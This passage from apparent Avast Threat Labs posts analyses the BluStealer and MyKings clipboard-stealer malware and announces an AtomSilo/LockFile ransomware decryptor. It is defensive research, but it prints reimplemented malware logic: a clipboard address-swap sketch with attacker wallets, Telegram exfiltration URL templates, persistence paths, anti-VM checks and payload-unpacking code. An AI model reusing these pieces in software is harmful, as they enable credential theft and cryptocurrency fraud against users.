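    if any(marker in model for marker in VM_MODEL_MARKERS):
        return True
    if baseboard_serial in ("0", "None"):  # the article says "contains 0 or None"
        return True
    return any(os.path.exists(p) for p in VM_DRIVER_FILES)
```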

.NET Component

BluStealer retrieves the .NET payload(s) from the resource section and decrypts them with the above WinZip AES algorithm using a hardcoded key. Then it executes one of the following command-line utilities to launch the .NET executable(s):

  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe

Examples of two .NET executables loaded by the VB core. The stolen credentials are written to “credentials.txt”

The .NET component does not communicate with the VB core in any way. It steals the credentials of popular browsers and applications, then writes them to disk at a chosen location with a designated filename (i.e., credentials.txt). The VB core looks for this drop and exfiltrates it later on. This mechanic is explained further in the next section.

The .NET component is just a copypasta of open-source C# projects listed below. You can find more information on their respective Github pages:

  • ThunderFox:
  • ChromeRecovery:
  • StormKitty:

Information Stealer

Both the VB core and the .NET component write stolen information to the %appdata%\Microsoft\Templates folder. Each type of stolen data is written to a different file with a predefined filename. The VB core sets up different timers to watch over each file and keeps track of its size. When a file's size increases, the VB core sends it to the attacker.

Handler         | Filename        | Stolen Information                                                                                                                              | Timer (s)
.NET component  | credentials.txt | Credentials stored in popular web browsers and applications, and system profiling info                                                         | 80
.NET component  |                 | Cookies stored in Firefox and Chrome browsers                                                                                                   | 60
VB core         |                 | Database files that often contain private keys of the following crypto wallets: ArmoryDB, Bytecoin, Jaxx Liberty, Exodus, Electrum, Atomic, Guarda, Coinomi | 50
VB core         | FilesGrabber\   | Document files (.txt, .rtf, .xlxs, .doc(x), .pdf, .utc) smaller than 2.5 MB                                                                     | 30
VB core         | Others          | Screenshot, keylogger, clipboard data                                                                                                           | 1 or none
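The watching mechanic amounts to a timer-driven poll of each drop file's size; a sketch with illustrative names (the real filenames and intervals are in the table above):

```python
import os

def watch_drop(path: str, last_size: int):
    """One timer tick: report whether the drop file grew since the last
    check, returning (grew, current_size). A grown file would then be
    queued for exfiltration by the VB core."""
    try:
        size = os.path.getsize(path)
    except OSError:          # drop file not written yet
        return False, last_size
    return size > last_size, size
```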

The BluStealer VB core also detects crypto addresses copied to the clipboard and replaces them with the attacker's predefined ones. Collectively, it supports the following address types: Bitcoin, Bitcoin Cash, Ethereum, Monero, and Litecoin.
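A minimal illustration of the swap for legacy Bitcoin addresses (the other coin formats follow analogous patterns); the substitute address is one of the attacker addresses from the IoC list at the end of this post:

```python
import re

# Legacy (Base58, P2PKH/P2SH) Bitcoin address pattern; illustrative only.
BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")

def swap_btc_address(clipboard_text: str, attacker_addr: str) -> str:
    """Replace any Bitcoin address found in clipboard text with the
    attacker's address, as BluStealer's clipboard hijacker does."""
    return BTC_RE.sub(attacker_addr, clipboard_text)

print(swap_btc_address("send to 1BoatSLRHtKNngkdXEeobR76b53LETtpyT",
                       "1ARtkKzd18Z4QhvHVijrVFTgerYEoopjLP"))
```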

Data Exfiltration

BluStealer exfiltrates stolen data via SMTP (reusing SpyEx's code) and a Telegram bot, hence the lack of server-side code. The Telegram token and chat_id are hardcoded to execute the two commands sendDocument and sendMessage, as shown below:

  •[BOT TOKEN]/sendMessage?chat_id=[MY_CHANNEL_ID]&text=[MY_MESSAGE_TEXT]
  •[BOT TOKEN]/sendDocument?chat_id=[MY_CHANNEL_ID]&caption=[MY_CAPTION]
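Because the token and chat_id are hardcoded, this exfiltration channel is easy to flag in network logs. A detection-oriented sketch, assuming the standard Telegram Bot API endpoint layout (api.telegram.org/bot<token>/<method>):

```python
import re

TG_EXFIL_RE = re.compile(
    r"https://api\.telegram\.org/bot(?P<token>\d+:[\w-]+)"
    r"/(?:sendMessage|sendDocument)\?chat_id=(?P<chat_id>-?\d+)"
)

def extract_telegram_exfil(url: str):
    """Return (bot_token, chat_id) if the URL looks like Bot API
    exfiltration via sendMessage/sendDocument, else None."""
    m = TG_EXFIL_RE.search(url)
    return (m.group("token"), m.group("chat_id")) if m else None
```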

The SMTP traffic is constructed using the Microsoft MimeOLE specification.

Example of SMTP content

.NET Loader Walkthrough

This .NET loader has been used by families such as Formbook, Agent Tesla, Snake Keylogger, Oski Stealer, and RedLine, as well as BluStealer.

Demo sample: 19595e11dbccfbfeb9560e36e623f35ab78bb7b3ce412e14b9e52d316fbc7acc

First Stage

The first stage of the .NET loader has a generic obfuscated look and is not matched by de4dot to any known .NET obfuscator. However, one recognizable characteristic is the inclusion of a single encrypted module in the resources:

By looking for this module’s reference within the code, we can quickly locate where it is decrypted and loaded into memory as shown below

Prior to loading the next stage, the loader may check for internet connectivity or set up persistence through the Startup folder and registry run keys. A few examples are:

  • C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chrome\chrom.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chrom
  • C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\paint\paint.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\paint
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup
  • C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\note\notepad.exe

In the samples we looked at closely, the module is decrypted using RC4 with a hardcoded key. The key is obfuscated by a string provider function. The best way to obtain the payload is to break at the tail jump that resides within the same namespace where the encrypted module is referenced. In most cases, this is the call to the external function Data(). Below are examples from different samples:

Second stage

Inside the Data() function of the second stage which has two strange resource files along with their getter functions

The second stage has its function calls and strings obfuscated, so the “Analyze” feature may not be as helpful. However, there are two resource files that look out-of-place enough for us to pivot off. Their getter functions can easily be found in the Resources class of the Properties namespace. Setting a breakpoint on the Ehiuuvbfrnprkuyuxqv getter function 0x17000003 leads us to a function where the resource is gzip-decompressed, revealing a PE file.

Ehiuuvbfrnprkuyuxqv is decompressed with gzip
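The decompression step is easy to reproduce statically; a sketch that gunzips such a resource and sanity-checks for a PE image:

```python
import gzip

def unpack_gzip_resource(resource: bytes) -> bytes:
    """Gzip-decompress an embedded resource and verify the result starts
    with the MZ magic of a PE file, as the second-stage payload does."""
    pe = gzip.decompress(resource)
    if not pe.startswith(b"MZ"):
        raise ValueError("decompressed resource is not a PE file")
    return pe
```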

On the other hand, the breakpoint on the Ltvddtjmqumxcwmqlzcos getter function 0x17000004 leaves us in the middle of the Data() function, where all function calls are made by passing a field into the CompareComparator function, which invokes it like a method.

CompareComparator is used to invoke one of its arguments

In order to understand what is going on, we have to know which functions these fields represent. From experience working with MassLogger in the past, the field-to-method map file is likely embedded in the resource section; in this case, the “Dic.Attr” naming is a strong tell.

Note that it is important to find out where these fields are mapped, because “Step into” may not take us directly to the designated functions. Some of the mapped functions are modified during the field-method binding process, so when the corresponding fields are invoked, DynamicResolver.GetCodeInfo() is called to build the target function at run-time. Even though the function modification only consists of replacing some opcodes with equivalent ones while keeping the content the same, it is sufficient to obfuscate function calls during dynamic analysis.

Dic.Attr is interpreted into a field-method dictionary

Searching for the “Dic.Attr” string leads us to the function where the mapping occurs. The dictionary value represents the method token that will be bound, and the key value is the corresponding field. As for the method tokens starting with 0x4A, just replace the 0x4A with 0x06 to get the correct methods; these are the ones chosen to be modified for obfuscation purposes.
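The fix-up works because .NET metadata tokens carry the table identifier in the high byte, and 0x06 is the MethodDef table; the remapping is a one-liner:

```python
def fix_method_token(token: int) -> int:
    """Restore the MethodDef table byte (0x06) on tokens the obfuscator
    rewrote to start with 0x4A, keeping the 24-bit row index intact."""
    if (token >> 24) == 0x4A:
        return 0x06000000 | (token & 0x00FFFFFF)
    return token

print(hex(fix_method_token(0x4A0000A3)))  # 0x60000a3
```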

With all the function calls revealed, we can understand what is going on inside the Data() method. First, it loads a new assembly, the decompressed Ehiuuvbfrnprkuyuxqv. Then it creates an instance of an object named SmartAssembly.Queues.MapFactoryQueue. To end the mystery, a method called RegisterSerializer is invoked with the data of the other resource file as an argument. At this point, we can assume that the purpose of this function is to decrypt the other resource file and execute it.

Heading to the newly loaded module (af43ec8096757291c50b8278631829c8aca13649d15f5c7d36b69274a76efdac), we can see the SmartAssembly watermark and all the obfuscation features labeled as shown below.

Overview of the decompressed Ehiuuvbfrnprkuyuxqv. Here you can find the method RegisterSerializer located inside SmartAssembly.Queues.MapFactoryQueue

The unpacking process is not much different from the previous layer, but with the overhead of code virtualization. In static analysis, our RegisterSerializer may look empty, but once the SmartAssembly.Queues class is instantiated, the method is loaded properly:

The function content when analyzed statically.
The function content after instantiation. Note that the argument “res” represents the data of the second resource file
Fast forward to where res is processed inside RegisterSerializer()

Lucky for us, the code looks fairly straightforward. The variable “res” holds the encrypted data and is passed to a function represented by RulesListener.IncludeState. Once again, the key is to find the field-token-to-method-token map file, which is likely located in the resource section. This time, searching for the GetManifestResourceStream function quickly gets us to the code section where the map is established:

The resource file Params.Rules is interpreted into a field-method dictionary

RulesListener.IncludeState has token 0x04000220 which is mapped to function 0x60000A3. Inside this function, the decryption algorithm is revealed anticlimactically: reversal and decompression:

Data from Ltvddtjmqumxcwmqlzcos is reversed
Then it is decompressed and executed

In fact, all the samples can be unpacked simply by decompressing the reversed resource file embedded in the second stage. Hopefully, even if this algorithm changes, my lengthy walkthrough will remain useful in showing how to defeat these obfuscation tricks.
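The reverse-then-decompress step is easy to reproduce outside the debugger. Below is a minimal Python sketch; it assumes the compression is raw DEFLATE (what .NET's System.IO.Compression.DeflateStream emits), and the function name is ours:

```python
import zlib

def unpack_resource(data: bytes) -> bytes:
    """Reverse the resource bytes, then inflate them.

    Assumption: the payload is raw DEFLATE with no zlib header,
    as produced by .NET's DeflateStream; wbits=-15 tells zlib
    to expect exactly that framing.
    """
    return zlib.decompress(bytes(reversed(data)), wbits=-15)
```

Feeding it the embedded resource bytes (e.g. the Ltvddtjmqumxcwmqlzcos data from the second stage) should yield the next-stage executable.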


In this article, we break down BluStealer functionalities and provide some utilities to deobfuscate and extract its IOCs. We also highlight its code reuse of multiple open-source projects. Despite still writing data to disk and without a proper C2 functionality, BluStealer is still a capable stealer. In the second half of the blog, we show how the BluStealer samples and other malware can be obtained from a unique .NET loader. With these insights, we hope that other analysts will have an easier time classifying and analyzing BluStealer.


The full list of IoCs is available at




Crypto Address List

1ARtkKzd18Z4QhvHVijrVFTgerYEoopjLP (1.67227860 BTC)
1AfFoww2ajt5g1YyrrfNYQfKJAjnRwVUsX (0.06755943 BTC)


0xd070c48cd3bdeb8a6ca90310249aae90a7f26303 (0.10 ETH)


Litecoin address:

Telegram Tokens:



[email protected] (
[email protected] ( )
[email protected] (
[email protected] (
[email protected]
[email protected] (
[email protected] (
[email protected] (

.NET Loader SHA-256:


The post BluStealer: from SpyEx to ThunderFox appeared first on Avast Threat Labs.

The King is Dead, Long Live MyKings! (Part 1 of 2)

12 October 2021 at 11:35

MyKings is a long-standing and relentless botnet which has been active from at least 2016. Since then it has spread and extended its infrastructure so much that it has even gained multiple names from multiple analysts around the world — MyKings, Smominru, and DarkCloud, for example. Its vast infrastructure consists of multiple parts and modules, including bootkit, coin miners, droppers, clipboard stealers, and more.

Our research has shown that, since 2019, the operators behind MyKings have amassed at least $24 million USD (and likely more) in the Bitcoin, Ethereum, and Dogecoin cryptowallets associated with MyKings. While we can’t attribute that amount solely to MyKings, it still represents a significant sum that can be tied to MyKings activity.

Our hunting for new samples brought us over 6,700 unique samples. Just since the beginning of 2020 (after the release of the Sophos whitepaper), we protected over 144,000 Avast users threatened by this clipboard stealer module. Most attacks happened in Russia, India, and Pakistan.

Map illustrating targeted countries from 1.1.2020 until 5.10.2021

In this first part of our two-part blog series, we will peek into the already known clipboard stealer module of MyKings, focusing on its technical aspects, monetization, and spread. In addition, we’ll look into how the functionality of  the clipboard stealer enabled attackers to carry out frauds with Steam trade offers and Yandex Disk links, leading to more financial gain and infection spread. 

Avast has been tracking the MyKings’ clipboard stealer since the beginning of 2018, but we can’t rule out an even earlier creation date. Basic functionality of this module was already covered by Gabor Szappanos from SophosLabs, but we are able to contribute new technical details and IoCs.

1. Monetary gain

When Sophos released their blog at the end of 2019, they stated that the coin addresses are “not used or never received more than a few dollars”. After tracing newer samples, we were able to extract new wallet addresses and extend the list of 49 coin addresses in Sophos IoCs to over 1300.

Because of the amount of new data, we decided to share our script, which can query the amount of cryptocurrency transferred through a crypto account. Because not all blockchains have this possibility, we decided to find out how much money attackers gained through Bitcoin, Ethereum, and Dogecoin accounts. After inspecting these addresses we have confirmed that more than $24,700,000 worth in cryptocurrencies was transferred through these addresses. We can safely assume that this number is in reality higher, because the amount consists of money gained in only three cryptocurrencies from more than 20 in total used in malware. It is also important to note here that not all of the money present in the cryptowallets necessarily comes from the MyKings campaign alone.
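As a rough illustration of how such totals can be queried, the sketch below uses the public blockchain.info query API for Bitcoin; it is a minimal stand-in, not the multi-currency script we link in the IoC section, and the endpoint is assumed to return the lifetime satoshis received as plain text:

```python
import urllib.request

SATOSHI_PER_BTC = 100_000_000

def satoshi_to_btc(satoshis: int) -> float:
    """Convert a satoshi count to BTC."""
    return satoshis / SATOSHI_PER_BTC

def btc_received(address: str, timeout: float = 10.0) -> float:
    """Lifetime BTC received by `address`, via the blockchain.info
    query API (one of several public block explorers)."""
    url = f"https://blockchain.info/q/getreceivedbyaddress/{address}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return satoshi_to_btc(int(resp.read()))
```

Summing `btc_received` over the extracted wallet list gives the Bitcoin portion of the totals shown in the table below.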

After taking a closer look at the transactions and inspecting the contents of installers that dropped the clipboard stealer, we believe that part of this money was gained through crypto miners. The clipboard stealer module and the crypto miners were seen using the same wallet addresses.

Cryptocurrency Earnings in USD Earnings in cryptocurrency
Bitcoin 6,626,146.252 [$] 132.212 [BTC]
Ethereum 7,429,429.508 [$] 2,158.402 [ETH]
Dogecoin 10,652,144.070 [$] 44,618,283.601 [DOGE]
Table with monetary gain (data refreshed 5.10.2021)
Histogram of monetary gains for Bitcoin, Ethereum and Dogecoin wallets

2. Attribution

Even though the clipboard stealer and all related files were attributed to MyKings in previous blog posts, we wanted to confirm those claims due to the lack of definitive proof. Some articles (e.g. by Sophos) say that some scripts in the attribution chain, like c3.bat, may kill other botnets or earlier versions of itself, which raises doubts. Other articles (e.g. by Guardicore) even work with the theory of a rival copycat botnet deleting MyKings. MyKings is a large botnet with many modules, and before attributing all the monetary gains to this clipboard stealer, we wanted to prove that the clipboard stealer is really a part of MyKings.

We started our attribution with the sample d2e8b77fe0ddb96c4d52a34f9498dc7dd885c7b11b8745b78f3f6beaeec8e191. This sample is a NSIS installer which drops NsCpuCNMiner in both 32 and 64 bit versions.

In the NSIS header, it was possible to see this Monero address used for the miner configuration:

NSIS header

Apart from the NsCpuCNMiner, the sample dropped an additional file named java12.exe into C:\Users\<username>\AppData\Local\Temp\java.exe. This file has SHA256 0390b466a8af2405dc269fd58fe2e3f34c3219464dcf3d06c64d01e07821cd7a and, according to our data, was downloaded from http://zcop[.]ru/java12.dat by the installer. It could also be downloaded from http://kriso[.]ru/java12.dat (both addresses contained multiple samples with different configurations at different times). This file contains a clipboard stealer, and the same Monero address can be found in both the clipboard stealer and the NSIS configuration.

After researching the Monero address, we found in a blog post written by Tencent Yujian Threat Intelligence Center that sample b9c7cb2ebf3c5ffba6fdeea0379ced4af04a7c9a0760f76c5f075ded295c5ce2 uses the same address. This sample is another NSIS installer which drops the NsCpuCNMiner and the clipboard stealer. This NSIS installer was usually dropped under the name king.exe or king.dat and could be downloaded from http://kr1s[.]ru/king.dat.

In the next step, we looked into the address http://kr1s[.]ru/king.dat and found that, at different times, this address contained the file f778ca041cd10a67c9110fb20c5b85749d01af82533cc0429a7eb9badc45345c, usually dropped into C:\Users\<username>\AppData\Local\Temp\king.exe or C:\Windows\system32\a.exe. This file is again an NSIS installer that downloads the clipboard stealer, but this time it contains URLs http://js[.] and http://js[.]

URL http://js[.] is interesting, because this URL is also contacted by the sample named my1.html or my1.bat with SHA256 5ae5ff335c88a96527426b9d00767052a3cba3c3493a1fa37286d4719851c45c.

This file is a batch script which is almost identical to the script with the same name my1.bat and SHA256 2aaf1abeaeeed79e53cb438c3bf6795c7c79e256e1f35e2a903c6e92cee05010, as shown further below.

Both scripts contain the same strings, such as C:\Progra~1\shengda and C:\Progra~1\kugou2010

There are only two important differences to notice:

  1. At line 12, one script uses address http://js[.] and the other uses address http://js[.]
  2. Line 25 in the second script has commands that the first script doesn’t have. You can notice strings like fuckyoumm3, a very well known indicator of MyKings.
Comparison of the batch scripts – script   5ae5ff335c88a96527426b9d00767052a3cba3c3493a1fa37286d4719851c45c contacting the C&C related to the clipboard stealer
Comparison of the batch scripts – script 2aaf1abeaeeed79e53cb438c3bf6795c7c79e256e1f35e2a903c6e92cee05010 contacting the C&C related to MyKings

Furthermore, it is possible to look at the file c3.bat with SHA256 0cdef01e74acd5bbfb496f4fad5357266dabb2c457bc3dc267ffad6457847ad4. This file is another batch script which communicates with the address http://js[.] and contains many MyKings specific strings like fuckayoumm3 or task name Mysa1.

Attribution chain

3. Technical analysis

Our technical analysis of the clipboard stealer focuses primarily on new findings.

3.1 Goal of the malware

The main purpose of the clipboard stealer is rather simple: checking the clipboard for specific content and manipulating it in case it matches predefined regular expressions. This malware counts on the fact that users do not expect to paste values different from the ones they copied. It is easy to notice a pasted value that is completely different from what was copied (e.g. a text instead of an account number), but it takes special attention to notice the change of a long string of random numbers and letters into a very similar-looking string, such as a cryptowallet address. This swapping is done using the functions OpenClipboard, EmptyClipboard, SetClipboardData and CloseClipboard. Even though this functionality is quite simple, it is concerning that attackers could have gained over $24,700,000 using such a simple method.

Simple routine of the clipboard content swap

As can be seen in the image below, most of the regular expressions used for checking the clipboard content match wallet formats of one specific cryptocurrency, but there are also regular expressions to match Yandex file storage, links to the Russian social network VKontakte, or Steam trade offer links.

List of regular expressions matching specific cryptocurrencies and URLs
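The matching logic boils down to a pattern table and a substitution function. The following is a simplified Python model: the two regexes are common textbook patterns for the address formats, not the sample's exact expressions, and the substitute wallets are taken from the IoC list in this post:

```python
import re

# Illustrative patterns only -- the real sample carries ~20 of them.
PATTERNS = {
    "BTC": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# Substitute wallets (addresses from the IoC section of this post).
SUBSTITUTES = {
    "BTC": "1ARtkKzd18Z4QhvHVijrVFTgerYEoopjLP",
    "ETH": "0xd070c48cd3bdeb8a6ca90310249aae90a7f26303",
}

def swap_clipboard(text: str) -> str:
    """Return the attackers' wallet if `text` looks like one; else keep it."""
    for coin, pattern in PATTERNS.items():
        if pattern.match(text):
            return SUBSTITUTES[coin]
    return text
```

In the malware, this check sits between the OpenClipboard/EmptyClipboard and SetClipboardData/CloseClipboard calls mentioned above.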

We were able to find many comments from people at BlockChain Explorer services believing that they sent money to the incriminated accounts by mistake and asking or demanding that their money be sent back. In response to this malicious activity, we want to increase awareness about frauds like this, and we highly recommend that people always double-check transaction details before sending money.

Comments from infected users connected to address 0x039fD537A61E4a7f28e43740fe29AC84443366F6

3.2 Defense & features

Some other blog posts describe a few anti-debugging checks and defense against system monitoring tools, but we can’t confirm any new development.

In order to avoid multiple executions, the clipboard stealer checks for a mutex on execution. The mutex name is created dynamically based on the OS version it is launched on: the function RegOpenKeyExA opens the registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion, and RegQueryValueExA then retrieves the value of ProductName. The obtained value is concatenated with the constant suffix 02. This method yields many possible mutex names; the list below shows a few examples:

  • Windows 7 Professional02
  • Windows 7 Ultimate02
  • Windows 10 Enterprise02
  • Windows 10 Pro02
  • Windows XP02

In a different version of the malware, an alternative value is used: BuildGUID from the registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion. This value is likewise appended with the suffix 02 to create the final mutex name.
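Reconstructing the mutex name is straightforward; a small Python sketch (the optional winreg lookup mirrors the RegOpenKeyExA/RegQueryValueExA calls described above, and the function name is ours):

```python
import sys

def mutex_name(product_name=None):
    """Build the stealer's mutex name: the OS ProductName (or, in
    some variants, BuildGUID) plus the constant suffix "02"."""
    if product_name is None and sys.platform == "win32":
        import winreg  # Windows-only module
        with winreg.OpenKey(
                winreg.HKEY_LOCAL_MACHINE,
                r"SOFTWARE\Microsoft\Windows NT\CurrentVersion") as key:
            product_name, _ = winreg.QueryValueEx(key, "ProductName")
    return f"{product_name}02"
```

On an infected Windows 10 Pro machine this would yield "Windows 10 Pro02", matching the examples above.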

Another defense mechanism of this malware is hiding the addresses of the cryptowallets belonging to the attackers. When the malware matches any of the regular expressions in the clipboard, it substitutes the clipboard content with a value that is hardcoded inside the malware sample. For protection against quick analysis and against static extraction with regular expressions, the substitute values are encrypted. The encryption used is a very simple ROT cipher, where the key is set to -1.

For a quick and static extraction of wallets from samples, it’s possible to decrypt the whole sample (which destroys all data except wanted values) and then use regular expressions to extract the hidden substitute values. The advantage of this approach is that the malware authors already provided us with all necessary regular expressions; thus the extraction process of the static information can be easily automated.
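Putting the two observations together, wallet extraction can be automated in a few lines of Python. The direction of the ROT shift is our assumption from the description above (key -1 on encryption, hence +1 to decrypt), and only the Bitcoin pattern is shown:

```python
import re

def rot_decrypt(data: bytes, key: int = -1) -> bytes:
    # Encryption added `key` (-1) to every byte, so decryption
    # subtracts it; flip the sign if your sample differs.
    return bytes((b - key) & 0xFF for b in data)

# Bitcoin address pattern; the sample itself ships ~20 such regexes.
BTC_RE = re.compile(rb"[13][a-km-zA-HJ-NP-Z1-9]{25,34}")

def extract_wallets(sample: bytes):
    # Decrypting the whole binary garbles everything except the
    # hidden substitute values, which then match the regexes.
    return BTC_RE.findall(rot_decrypt(sample))
```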

3.3 Newly uncovered functionality

With a larger dataset of samples, we were also able to reveal the intentions of regular expressions checking for URLs.

3.3.1 Steam trade frauds

One of the regular expressions hardcoded in samples looks like this:

This kind of expression is supposed to match Steam trade offer links. Users on the Steam platform can create trade offers to trade their (usually in-game) items from their inventory with other users. The value of tradeable items starts at only a few cents, but the most expensive items sell for hundreds or thousands of dollars.

The clipboard stealer manipulates the trade offer URL and changes the receiving side, so Steam users send their items to someone completely unknown. The exchanged link then looks like this one:

In total, we were able to extract 14 different Steam trade offer links that appeared in almost 200 samples. These links lead us to 14 Steam accounts — some of which were banned and some had set privacy restrictions — but among the working public accounts we found information assuring us that these frauds happened. An example is this account, which was bound to the trade offer link listed above:

After checking the comments section of this account, we could see multiple people getting angry and curious as to why their trade offer links are getting changed. Even though some people noticed the change in the trade offer link, we suppose that some trades were completed. We were not able to estimate how much money could have been stolen through this technique.

Comments  from

Translation of comments:

  1. 9 Oct, 2020 @ 7:47 pm why is my trade link changing to yours?
  2. 21 Jul, 2020 @ 2:16 pm Th for the garbage with a trade link !!! ???
  3. 27 Jun, 2020 @ 5:05 am what a fagot what did you do with the link

3.3.2 Fake Yandex Disk links 

Another functionality is related to the regular expression:

This regular expression matches links to Yandex Disk storage. Yandex Disk is a cloud service created by the multinational Russian company Yandex and can be used similarly to Google Drive or Dropbox for sharing files.

The objective of this technique is to match links that users send to their friends and family to share files or photos. If the malware runs on the sender’s machine, the infected victim sends wrong links to all their acquaintances. If the malware runs on the machine of a user who receives a link and copy/pastes it into the browser address bar, that victim again opens a wrong link. In both cases, the wrong link gets opened by someone unaware that the content is wrong, and the victim downloads and opens the files from that link, because there is no reason not to trust files received from someone they know.

From the set of analyzed samples, we extracted the following 4 links to Yandex Disk storage:

  1. https://yadi[.]sk/d/cQrSKI0591KwOg
  2. https://yadi[.]sk/d/NGyR4jFCNjycVA
  3. https://yadi[.]sk/d/zCbAMw973ZQ5t3
  4. https://yadi[.]sk/d/ZY1Qw7RRCfLMoQ

All of the links contain packed archives in .rar or .zip format, protected with a password. The password is usually written in the name of the file. As you can see in the image below, the file is named, for example, “photos,” with the password 5555.

Contents on https://disk[.]

4. Conclusion

In this first part of the blog series, we focused on the MyKings clipboard stealer module, going through the attribution chain and uncovering the amounts of money that attackers were able to obtain along the way. The clipboard stealer also focuses on frauds regarding Steam trade offers and Yandex Disk file sharing, distributing further malware to unaware victims.

In the next part of this blog series, we will go down the rabbit hole — exploring the contents of one of the downloaded payloads and providing you with an analysis of the malware inside. Don’t miss it!

Indicators of Compromise (IoC)

SHA256 hashes

Also in our GitHub.

Windows 7 Professional02
Windows 7 Ultimate02
Windows 10 Enterprise02
Windows 10 Pro02
Windows XP02

Also in our GitHub.

C&C and logging servers

Complete list in our GitHub.


Yandex disk links

Complete list in our GitHub.

Steam trade offer links

Complete list in our GitHub.

Wallet addresses

Complete list in our GitHub.


Script for querying amounts transferred through wallet addresses can be found in our GitHub.

The post The King is Dead, Long Live MyKings! (Part 1 of 2) appeared first on Avast Threat Labs.

Avast releases decryptor for AtomSilo and LockFile ransomware

27 October 2021 at 15:59

On Oct 17, 2021, Jiří Vinopal published information about a weakness in the AtomSilo ransomware and that it is possible to decrypt files without paying the ransom. Slightly later, he also analyzed another ransomware strain, LockFile. We prepared our very own free Avast decryptor for both the AtomSilo and LockFile strains.

Limitation of the decryptor

During the decryption process, the Avast AtomSilo decryptor relies on a known file format in order to verify that the file was successfully decrypted. For that reason, some files may not be decrypted. This can include files with a proprietary or unknown format, or with no format at all, such as text files.

How AtomSilo and LockFile Work

Both the AtomSilo and LockFile ransomware strains are very similar to each other and except for minor differences, this description covers both of them. 

AtomSilo ransomware searches local drives using a fixed drive list, whilst LockFile calls GetLogicalDriveStringsA() and processes all fixed drives.

A separate thread is created for each drive in the list. This thread recursively searches the given logical drive and encrypts files found on it. To prevent paralyzing the compromised PC entirely, AtomSilo has a list of folders, file names and file types that are left unencrypted which are listed here:

Excluded folders
Boot Windows Windows.old Tor Browser
Internet Explorer Google Opera Opera Software
Mozilla Mozilla Firefox $Recycle.Bin ProgramData
All Users
Excluded files
autorun.inf index.html  boot.ini bootfont.bin
bootsect.bak bootmgr bootmgr.efi bootmgfw.efi
desktop.ini iconcache.db ntldr ntuser.dat
ntuser.dat.log ntuser.ini thumbs.db #recycle
Excluded extensions
.hta .html .exe .dll .cpl .ini
.cab .cur .cpl .drv .hlp .icl
.icns .ico .idx .sys .spl .ocx

LockFile avoids files and folders, containing those sub-strings:

Excluded sub-strings
Windows NTUSER LOCKFILE .lockfile

In addition to that, there is a list of 788 file types (extensions) which won’t be encrypted. Those include .exe, but also .jpg, .bmp and .gif. You may notice that some of them are included repeatedly.
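To illustrate how these lists combine, here is a simplified Python model of the exclusion check; only a handful of entries from each table above are reproduced, while the real sample iterates its full lists:

```python
from pathlib import PureWindowsPath

# Abridged excerpts of AtomSilo's exclusion tables (see above).
SKIP_DIRS = {"boot", "windows", "windows.old", "$recycle.bin", "programdata"}
SKIP_FILES = {"autorun.inf", "boot.ini", "ntldr", "thumbs.db", "desktop.ini"}
SKIP_EXTS = {".exe", ".dll", ".sys", ".ini", ".ico"}

def is_excluded(path: str) -> bool:
    """True if the ransomware would leave `path` unencrypted."""
    p = PureWindowsPath(path)
    # Any excluded folder anywhere on the path spares the file...
    if any(part.lower() in SKIP_DIRS for part in p.parts[:-1]):
        return True
    # ...as does an excluded file name or extension.
    return p.name.lower() in SKIP_FILES or p.suffix.lower() in SKIP_EXTS
```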

The ransomware generates an RSA-4096 session keypair for each victim. Its private part is then stored in the ransom note file, encrypted by the master RSA key (hardcoded in the binary). A new AES-256 file key is generated for each file. This key is then encrypted by the session RSA key and stored at the end of the encrypted file, together with the original file size.
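The per-file footer can be modeled as follows. This is an illustrative layout — the exact on-disk offsets and field order may differ from this sketch — but it captures the scheme: the RSA-4096-encrypted AES file key (a 512-byte ciphertext block) plus the original file size, appended after the encrypted data:

```python
import struct

RSA4096_BLOB = 512  # size of an RSA-4096 ciphertext block in bytes

def append_footer(ciphertext, enc_file_key, orig_size):
    # enc_file_key is the per-file AES-256 key, already encrypted
    # with the session RSA key; orig_size is the plaintext length.
    assert len(enc_file_key) == RSA4096_BLOB
    return ciphertext + enc_file_key + struct.pack("<Q", orig_size)

def parse_footer(blob):
    # Walk backwards from the end: 8-byte size, then the key blob.
    orig_size, = struct.unpack("<Q", blob[-8:])
    enc_file_key = blob[-8 - RSA4096_BLOB:-8]
    return blob[:-8 - RSA4096_BLOB], enc_file_key, orig_size
```

A decryptor works the footer in reverse: recover the session RSA key from the ransom note, decrypt `enc_file_key`, then decrypt the data and truncate to `orig_size`.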

Alongside the encrypted files, the ransomware creates a ransom note file with one of the names:

  • README-FILE-%ComputerName%-%TimeStamp%.hta
  • LOCKFILE-FILE-%ComputerName%-%TimeStamp%.hta

Encrypted files can be recognized by the .ATOMSILO or .lockfile extension: 

When the encryption process is complete, the ransom note is shown to the user. Each strain’s ransom note has its own look:

AtomSilo Ransom Message
LockFile Ransom Message

How to use the Decryptor

To decrypt your files, please, follow these steps:

  1. Download the free decryptor. The single EXE file covers both ransomware strains.
  2. Simply run the EXE. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  3. On the initial page, you can see a list of credits. Simply click “Next”.
  4. On the next page, select the list of locations you want to be decrypted. By default, it contains a list of all local drives.
  5. On the third page, you can select whether you want to back up encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins.
  6. Let the decryptor work and wait until it finishes.


We would like to thank Jiří Vinopal for sharing his analysis of both ransomware strains.


SHA256 Extension
d9f7bb98ad01c4775ec71ec66f5546de131735e6dba8122474cc6eb62320e47b .ATOMSILO
bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce .lockfile

The post Avast releases decryptor for AtomSilo and LockFile ransomware appeared first on Avast Threat Labs.

